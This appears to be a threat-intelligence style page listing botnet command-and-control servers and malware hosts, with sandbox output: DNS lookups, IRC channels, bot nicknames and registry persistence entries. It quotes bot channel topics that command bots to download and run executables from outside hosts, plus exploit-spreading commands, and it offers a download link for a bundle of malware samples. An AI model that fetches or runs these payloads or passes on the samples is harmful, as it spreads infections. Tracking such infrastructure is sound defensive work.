DNS Lookup Host Name IP Address 0 127.0.0.1 browseusers.myspace.com browseusers.myspace.com 63.135.80.224 www.myspace.com www.myspace.com 63.135.80.46 x.myspacecdn.com x.myspacecdn.com 212.201.100.176 js.myspacecdn.com js.myspacecdn.com 212.201.100.169 c4.ac-images.myspacecdn.com c1.ac-images.myspacecdn.com c4.ac-images.myspacecdn.com 195.176.255.157 c2.ac-images.myspacecdn.com c1.ac-images.myspacecdn.com 195.176.255.136 c2.ac-images.myspacecdn.com 195.176.255.146 c3.ac-images.myspacecdn.com c3.ac-images.myspacecdn.com 195.176.255.138 cms.myspacecdn.com cms.myspacecdn.com 212.201.100.169 b.myspace.com www.google-analytics.com www.google-analytics.com 209.85.149.102 b.myspace.com 63.135.80.58 myspace.ivwbox.de myspace.ivwbox.de 193.46.63.103 qs.ivwbox.de qs.ivwbox.de 91.215.101.32 l.sharethis.com wd.sharethis.com delb.opt.fimserve.com l.sharethis.com 46.51.172.48 wd.sharethis.com 79.125.110.9 delb.opt.fimserve.comRead more...
30 mb exe files from diferent malwares
here a download link for everyone who like to spend some time inside exe files with malware signatures Download: http://d4fdc870.dyo.gs
efy2.internetdsl.tpnet.pl(botnet hosted in Poland Krakow Static Ip)
Remote Host Port Number 212.97.132.151 80 95.211.84.41 80 83.15.2.2 31092 NICK US|computername USER yoxuruho UNIX UNIX :username JOIN #all# Resolved : [serv01.colo.owned.hu] To [83.15.2.2] Resolved : [serv01.colo.owned.hu] To [83.233.167.103] Resolved : [serv01.colo.owned.hu] To [81.219.80.126] Resolved : [serv01.colo.owned.hu] To [196.46.191.100] Other details * The following ports were open in the system: Port Protocol Process 1055 TCPRead more...
bean.F-QACS.INF(botnet hosted in United Kingdom Knowinservers Ltd)
bean.F-QACS.INFO:5337 178.162.175.63:5337 Nick: [NEW][USA]72014 Username: [NEW][USA]72014 Joined Channel: #ed HKU​S-1-5-21-842925246-1425521274-308236825-500​SOFTWARE​MICROSOFT​WINDOWS​CURRENTVERSION​RUN Windows Service Host C:Documents and SettingsAdministratorApplication Datasvchost.exe infos about hosting: http://whois.domaintools.com/178.162.175.63
a.botsgod.info(VirUs aka lamer botnet hosted in France Gandi)
a.botsgod.info 4949 ##A## Topic is ‘!j #1,#2’ Set by XxX on Wed Dec 22 07:14:52 * Topic is ‘!NAZEL http://dvdmediaplus.in/install.48755.exe s9d8y5.exe 1’ Set by xXx on Wed Dec 22 20:03:17 Topic is ‘!NAZEL http://promofile.info/setup715.exe SDSDSD.exe 1’ Set by XxX on Wed Dec 22 07:18:12 a.botsgod.info ip: 95.142.173.4 a.botsgod.info ip: 95.142.173.176 infos about hosting: http://whois.domaintools.com/95.142.173.4
aaaaaaaa.schooluni.us(buterfly bot hosted in Russian Federation Vline Ltd)
aaaaaaaa.schooluni.us:7196 PASS laorosr Channel#dpi Channel#! NICK [N00_USA_XP_39922187] rssr SP2-917 * 0 :COMPUTERNAME Now talking in #! Topic is ‘.asc -S|.http http://61.136.59.34/mobi.exe|.asc exp_all 25 5 0 -a -r -e|.asc exp_all 25 5 0 -b -r -e|.asc exp_all 20 5 0 -b|.asc exp_all 20 5 0 -c|.asc exp_all 10 5 0 -a’ Set by nonSTOPspread66 on SatRead more...
serv01.colo.owned.hu(botnet hosted with Egypt Afrinic)
Remote Host Port Number 196.46.191.100 31092 212.97.132.151 80 95.211.84.41 80 NICK US|computername USER duiizaui UNIX UNIX :username JOIN #all# JOIN #US Now talking in #all# Topic On: [ #all# ] [ zg8w2CSUq2uia0QJlZCB54+bx1ORaIYwuWdNWqLiaRItRqdzrOHaoL/ZlA/RBgykhuYXvz0p+UCC5AowzlgNggVoLqkXzM+L2HR5WjCPVOsWHS21OdGLfnuALxORajUP/gdM/hRbMXB+mBM995oqart5JdolC5OI ] Modes On: [ #all# ] [ +smntMu ] Resolved : [serv01.colo.owned.hu] To [83.15.2.2] Resolved : [serv01.colo.owned.hu] To [83.233.167.103] Resolved : [serv01.colo.owned.hu] ToRead more...
adpool-3.net(malware hosted with hosting.ua)
DNS Lookup Host Name IP Address www.microsoft.com 65.55.12.249 dell-d3e62f7e26 10.1.7.2 10.1.1.1 10.1.1.1 wpad adpool-3.net adpool-3.net 178.86.0.144 UDP Connections Opened listening TCP connection on port: 1515 Opened listening TCP connection on port: 6135Download URLs http://178.86.0.144/cgi-bin/npr/web/t_riz.cgi?magic=151561350006&ox=2-5-1-2600&tm=60&id=-1&cache=0880350166 (adpool-3.net) Outgoing connection to remote server: www.microsoft.com port 80 Outgoing connection to remote server: adpool-3.net TCP port 80 Registry Changes byRead more...
rolando9.clanhosters.org(malware hosted with United States Dallas Theplanet.com Internet Services Inc)
DNS Lookup Host Name IP Address dell-d3e62f7e26 10.1.14.2 10.1.1.1 10.1.1.1 wpad stuypel.free.bg stuypel.free.bg 188.40.80.188 rolando9.clanhosters.org rolando9.clanhosters.org 174.121.1.58 sharo.fileave.com sharo.fileave.com 64.62.181.43 Opened listening TCP connection on port: 12380Download URLs http://188.40.80.188/Thumbsx.db (stuypel.free.bg) http://64.62.181.43/0234254.exe (sharo.fileave.com) Outgoing connection to remote server: stuypel.free.bg TCP port 80 Outgoing connection to remote server: rolando9.clanhosters.org TCP port 80 Outgoing connection to remote server:Read more...
synyoshi.dyndns.info(botnet hosted with United States Walnut Psychz Networks)
– DNS Queries: Name Query Type Query Result Successful Protocol synyoshi.dyndns.info DNS_TYPE_A 173.224.219.21 YES udp 173.224.219.21:6667 Nick: n[XP-AUT]176146 Username: 8977 Joined Channel: #ganja# Registry Changes by all processes Create or Open Changes HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun “Windows Update System” = C:Dokumente und EinstellungenAdministratorAnwendungsdatentaskeng.exe HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun “Windows Update System” = C:Dokumente und EinstellungenAdministratorAnwendungsdatentaskeng.exe HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesSharedAccessParametersFirewallPolicyStandardProfileAuthorizedApplicationsList “Windows Update System” = C:Dokumente undRead more...